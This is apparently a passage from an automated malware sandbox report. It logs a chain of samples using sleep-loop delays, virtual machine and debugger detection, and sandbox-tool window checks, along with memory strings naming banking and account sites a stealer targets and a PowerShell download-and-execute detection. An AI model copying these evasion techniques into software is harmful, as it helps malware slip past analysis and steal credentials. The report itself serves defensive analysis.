Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Thread sleep count: Count: 5856 delay: -10 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E2C2A2 FindFirstFileExW, 17_2_00E2C2A2
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E668EE FindFirstFileW,FindClose, 17_2_00E668EE
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 17_2_00E6698F
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00E5D076
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00E5D3A9
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_00E69642
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_00E6979D
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 17_2_00E5DBBE
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 17_2_00E69B2B
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E65C97 FindFirstFileW,FindNextFileW,FindClose, 17_2_00E65C97
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 17_2_00DF42DE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: Amcache.hve.21.dr Binary or memory string: VMware
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: Amcache.hve.21.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: skotes.exe, 0000000B.00000002.3769918015.000000000148B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.3769918015.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000000D.00000002.1976198696.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000000D.00000002.1976198696.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, b74664dd7e.exe, 0000000E.00000002.2586371888.0000000001342000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000000F.00000002.2352900147.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, b74664dd7e.exe, 00000013.00000002.2673207759.0000000001019000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000001A.00000002.2284052492.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000001B.00000002.3769503003.0000000001480000.00000004.00000020.00020000.00000000.sdmp, b74664dd7e.exe, 0000001D.00000002.2792862379.0000000001269000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 3ec4738210.exe, 0000001A.00000002.2284052492.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware38
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.21.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 3ec4738210.exe, 0000000D.00000002.1976198696.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware*
Source: Amcache.hve.21.dr Binary or memory string: vmci.sys
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: axplong.exe, 0000001B.00000002.3769503003.000000000143D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@vH
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.21.dr Binary or memory string: VMware20,1
Source: Amcache.hve.21.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.21.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: b74664dd7e.exe, 0000001D.00000002.2792862379.000000000122B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.21.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: RegAsm.exe, 00000021.00000002.2777212382.000000000633A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: Amcache.hve.21.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.21.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.21.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.21.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.21.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.21.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: 3ec4738210.exe, 3ec4738210.exe, 0000000F.00000002.2351235886.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, b74664dd7e.exe, 00000013.00000002.2671660081.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, 610cd559ac.exe, 00000017.00000002.1925800293.00000000002C7000.00000040.00000001.01000000.0000000D.sdmp, 3ec4738210.exe, 0000001A.00000002.2281536186.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, axplong.exe, 0000001B.00000002.3753803094.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 0000001C.00000002.1990355028.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, b74664dd7e.exe, 0000001D.00000002.2791005796.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, axplong.exe, 0000001E.00000002.2132470918.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000029.00000002.2741698869.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual USB Mouse
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: Amcache.hve.21.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.21.dr Binary or memory string: VMware, Inc.
Source: b74664dd7e.exe, 0000000E.00000002.2586371888.00000000012CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware~
Source: Amcache.hve.21.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.21.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.21.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: b74664dd7e.exe, 0000000E.00000002.2586371888.000000000132E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW&
Source: Amcache.hve.21.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: file.exe, 00000006.00000003.1307057377.000000000080A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\hl
Source: b74664dd7e.exe, 00000013.00000002.2673207759.0000000000FED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.21.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.21.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: b74664dd7e.exe, 0000000E.00000002.2586371888.0000000001315000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000001A.00000002.2284052492.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.21.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.21.dr Binary or memory string: \driver\vmci,\driver\pci
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: Amcache.hve.21.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 3ec4738210.exe, 0000000D.00000002.1976198696.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWT
Source: b74664dd7e.exe, 0000001D.00000002.2792862379.0000000001297000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWE
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: Amcache.hve.21.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: file.exe, 00000006.00000002.1318517366.0000000000F98000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000008.00000002.1352700970.0000000000FA8000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmp, 3ec4738210.exe, 0000000D.00000002.1975346461.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, b74664dd7e.exe, 0000000E.00000002.2584529637.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, 3ec4738210.exe, 0000000F.00000002.2351235886.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, b74664dd7e.exe, 00000013.00000002.2671660081.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, 610cd559ac.exe, 00000017.00000002.1925800293.00000000002C7000.00000040.00000001.01000000.0000000D.sdmp, 3ec4738210.exe, 0000001A.00000002.2281536186.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, axplong.exe, 0000001B.00000002.3753803094.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 0000001C.00000002.1990355028.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 3ec4738210.exe, 0000000F.00000002.2352900147.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Found API chain indicative of debugger detection
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\1000015002\b74664dd7e.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort
Source: C:\Users\user\1000015002\b74664dd7e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_04B20892 rdtsc 6_2_04B20892
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E6EAA2 BlockInput, 17_2_00E6EAA2
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00E22622
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 17_2_00DF42DE
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DE652B mov eax, dword ptr fs:[00000030h] 11_2_00DE652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DEA302 mov eax, dword ptr fs:[00000030h] 11_2_00DEA302
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E14CE8 mov eax, dword ptr fs:[00000030h] 17_2_00E14CE8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 17_2_00E50B62
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00E22622
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E1083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00E1083F
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E109D5 SetUnhandledExceptionFilter, 17_2_00E109D5
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E10C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_00E10C21
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 7672, type: MEMORYSTR
